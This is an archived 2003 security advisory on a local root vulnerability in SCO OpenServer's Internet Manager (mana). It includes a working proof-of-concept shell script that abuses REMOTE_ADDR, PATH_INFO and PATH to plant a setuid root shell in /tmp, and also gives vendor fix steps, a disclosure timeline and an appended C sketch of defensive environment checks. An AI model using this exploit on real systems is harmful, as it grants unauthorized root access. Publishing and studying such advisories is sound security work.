
TEXONET-20030902.txt

16 Sep 2003. Reported by texonet.com. Type: packetstorm. Source: packetstormsecurity.com

SCO Internet Manager vulnerability allows local users to gain root privileges on OpenServer platforms.

`-----------------------------------------------------------------------  
Texonet Security Advisory 20030902  
-----------------------------------------------------------------------  
Advisory ID : TEXONET-20030902  
Authors : Joel Soderberg and Christer Oberg  
Issue date : Tuesday, September 02, 2003  
Publish date : Monday, September 15, 2003  
Application : SCO OpenServer / Internet Manager (mana)  
Version(s) : 5.0.5 - 5.0.7  
Platforms : OpenServer  
Availability : http://www.texonet.com/advisories/TEXONET-20030902.txt  
-----------------------------------------------------------------------  
  
  
Problem:  
-----------------------------------------------------------------------  
A vulnerability in the SCO Internet Manager (mana) program for  
OpenServer (SCO Unix) lets local users gain root-level privileges.  
  
  
Description:  
-----------------------------------------------------------------------  
Short description from SCO: "SCO Internet Manager - allowing users to  
easily configure and manage Internet and intranet servers."  
  
The SCO Internet Manager (mana) is designed to be run via the   
ncsa_httpd on port 615 and it is password protected.  
  
Running /usr/internet/admin/mana/mana locally is, however, possible.  
  
By exporting the environment variable REMOTE_ADDR and setting it to  
127.0.0.1, mana is tricked into executing the file menu.mana as if it  
had been run via the ncsa_httpd password-protected area.  
  
Another interesting environment variable is PATH_INFO, which tells mana  
which .mana file should be run.  
  
The file pass-err.mana contains the following lines:  
  
<TCL>  
if {[catch {exec hostname} hostName] != 0} {  
set hostName localhost  
}  
set mana(localHostName) $hostName  
return {}  
</TCL>  
  
This tells us that mana will execute "hostname" when this file is run.  
  
Setting the environment variable PATH_INFO to /pass-err.mana and PATH  
to ./:$PATH makes mana execute ./hostname with root privileges.  
  
  
Example (Simple POC):  
  
This proof of concept for OpenServer 5.0.7 should give any local user  
euid=0(root).  
  
  
$ uname -a  
SCO_SV openserv 3.2 5.0.7 i386  
$ id  
uid=200(test) gid=50(group) groups=50(group)  
$ sh mana-root.sh  
# id  
uid=200(test) gid=50(group) euid=0(root) groups=50(group)  
  
  
- Code Start -  
mana-root.sh  
----------------------------C-U-T---H-E-R-E----------------------------  
#!/bin/sh  
#  
# OpenServer 5.0.7 - Local mana root shell  
#  
#  
  
REMOTE_ADDR=127.0.0.1  
PATH_INFO=/pass-err.mana  
PATH=./:$PATH  
  
export REMOTE_ADDR  
export PATH_INFO  
export PATH  
  
echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname  
  
chmod 755 hostname  
  
/usr/internet/admin/mana/mana > /dev/null  
  
/tmp/sh  
  
----------------------------C-U-T---H-E-R-E----------------------------  
- Code End -  
  
  
Workaround:  
-----------------------------------------------------------------------  
The proper solution is to install the latest packages.  
  
Location of Fixed Binaries  
  
ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19  
  
  
Verification  
  
MD5 (VOL.000.000) = 37b55df2c9000c703a22baafbe9cef42  
  
md5 is available for download from ftp://ftp.sco.com/pub/security/tools  
  
  
Installing Fixed Binaries  
  
Upgrade the affected binaries with the following sequence:  
  
1) Download the VOL* files to the /tmp directory  
  
2) Run the custom command, specify an install from media images, and   
specify the /tmp directory as the location of the images.  
  
  
Disclosure Timeline:  
-----------------------------------------------------------------------  
9/02/2003: Vendor notified by e-mail  
9/03/2003: Vendor has verified the issue and is working on the solution  
9/15/2003: Public release  
  
  
About Texonet:  
-----------------------------------------------------------------------  
Texonet is a Swedish-based security company with a focus on penetration  
testing / security assessments, research and development.  
  
  
Contacting Texonet:  
-----------------------------------------------------------------------  
E-mail: advisories(-at-)texonet.com  
Homepage: http://www.texonet.com/  
Phone: +46-8-55174611  
  
`
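
The advisory's root cause is a privileged program that trusts REMOTE_ADDR, PATH_INFO and PATH as inherited from the caller. The C sketch below is an added example, not code from the advisory or from SCO, showing the environment checks a privileged helper would apply before running anything. The SAFE_PATH value and all function names are assumptions made for illustration.

```c
/* Added example (not from the advisory): environment hygiene for a
 * hypothetical privileged helper. All names here are illustrative. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SAFE_PATH "/bin:/usr/bin"   /* assumed trusted directories */

/* 1 if PATH is unset or any entry is empty or not absolute; such entries
 * resolve against the caller's current directory ("./", ".", "", "bin"). */
int path_has_relative_entry(const char *path)
{
    if (path == NULL)
        return 1;
    for (const char *p = path; ; p++) {
        if (*p != '/')
            return 1;
        p = strchr(p, ':');
        if (p == NULL)
            return 0;
    }
}

/* Pin PATH and drop IFS; when the caller is untrusted (for example, real
 * uid differs from effective uid) also drop the CGI variables so they
 * cannot stand in for web-server authentication. Returns 0 on success. */
int harden_env(int untrusted_caller)
{
    static const char *const cgi_vars[] = { "REMOTE_ADDR", "PATH_INFO" };
    if (setenv("PATH", SAFE_PATH, 1) != 0 || unsetenv("IFS") != 0)
        return -1;
    for (size_t i = 0; untrusted_caller && i < 2; i++)
        if (unsetenv(cgi_vars[i]) != 0)
            return -1;
    return 0;
}

/* Host name without spawning "hostname": same localhost fallback as the
 * page's TCL snippet, but no PATH lookup is involved at all. */
const char *local_host_name(char *buf, size_t len)
{
    if (len == 0 || gethostname(buf, len) != 0 || buf[0] == '\0')
        return "localhost";
    buf[len - 1] = '\0';   /* gethostname may not terminate on truncation */
    return buf;
}

int main(void)
{
    char host[256];
    printf("inherited PATH unsafe: %d\n", path_has_relative_entry(getenv("PATH")));
    if (harden_env(getuid() != geteuid()) != 0)
        return 1;
    printf("PATH now %s, host %s\n", getenv("PATH"), local_host_name(host, sizeof host));
    return 0;
}
```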
